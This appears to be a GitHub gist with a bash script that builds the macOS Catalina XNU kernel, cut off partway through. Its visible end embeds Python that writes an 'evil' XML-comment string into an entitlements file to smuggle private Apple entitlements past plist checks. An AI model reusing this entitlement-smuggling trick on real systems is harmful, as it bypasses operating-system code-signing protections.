Skip to content

Instantly share code, notes, and snippets.

@c834606877
c834606877 / build-xnu-6153.141.1.sh
Created June 1, 2021 14:07 — forked from zhuowei/build-xnu-6153.141.1.sh
A script to build XNU version xnu-6153.141.1 (macOS Catalina 10.15.6), based on Scott Knight's script
#! /bin/bash
# build-xnu-6153.141.1.sh
# tested with Xcode 11.7 on macOS 11
# Changes:
# update to 10.15.6's kernel
# specify an Xcode
# force host OS version to 10.15 so Xcode's clang doesn't complain
#
# based on
#
import os
# preinstalled python is python2
filename = '/'.join(map(os.environ.get, ('TARGET_TEMP_DIR', 'FULL_PRODUCT_NAME'))) + '.xcent'
evil = '''
<!---><!-->
<key>platform-application</key>
<true/>
<key>com.apple.private.security.no-container</key>
<true/>